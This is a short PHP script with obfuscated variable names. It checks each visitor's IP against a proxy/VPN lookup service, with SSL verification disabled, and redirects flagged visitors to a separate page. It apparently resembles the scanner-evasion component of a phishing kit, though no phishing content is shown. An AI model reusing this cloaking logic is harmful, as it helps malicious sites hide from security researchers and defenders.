<?php 
$otukisp = parse_ini_file("Plomernan.ini", true);
$elkernaf = $otukisp['Proxy'];
$hunjerka = getenv("REMOTE_ADDR");
if ($elkernaf == 'on') {
if($hunjerka == "127.0.0.1") {
}else{
$kajherf = "https://blackbox.ipinfo.app/lookup/".$hunjerka;
$imokerfan = curl_init();  
curl_setopt($imokerfan,CURLOPT_URL,$kajherf);
curl_setopt($imokerfan,CURLOPT_RETURNTRANSFER,true);
curl_setopt($imokerfan, CURLOPT_SSL_VERIFYPEER, false);
$mantwena = curl_exec($imokerfan);
curl_close($imokerfan);
$kukhegs = $mantwena;
if($kukhegs == "Y") {
header('Location: Decmar/pxy.php');
die('<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html></html>');
exit();
    }
}}